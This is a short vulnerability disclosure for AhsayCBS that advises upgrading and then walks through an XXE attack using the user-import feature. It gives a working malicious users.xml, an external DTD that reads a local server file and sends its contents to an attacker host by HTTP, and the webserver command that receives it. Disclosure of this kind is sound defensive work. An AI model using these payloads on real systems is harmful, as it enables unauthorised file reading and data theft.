Advisory

Upgrade to the latest version of Ahsay, currently 8.1.1.50 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)

Technical details

For this we need a couple of things.

A webserver to serve xxe.dtd We also need a webserver to receive the servers response. First we need to create a zip file containing users.xml, users.xml must contain the following:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://172.16.238.1/xxe.dtd">
<settings>&send;</settings> 

Then we need to create the file xxe.dtd, that can contain the file we want to read. We then send the content to our listening server.

<!ENTITY % file SYSTEM "file:///C:\\Program Files\\AhsayCBS\\version.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://172.16.238.1/?%file;'>">
%all;   

now we need to start a webserver I use Python for this on my system 172.16.238.1

Run the following command in the directory containing the .dtd file:

python -m SimpleHTTPServer 80

There will be a webserver listening on port 80. Now in the application go to the page to “Move / Import / Export Users” and choose the option import users to and select the zip file we created.

Screenshot: importing the zip file and saving it.

Screenshot: When the save button is hit, we immediately get a response to our webserver requesting the dtd file. This file gets executed and sends the content, 8.1.0.50, to our server.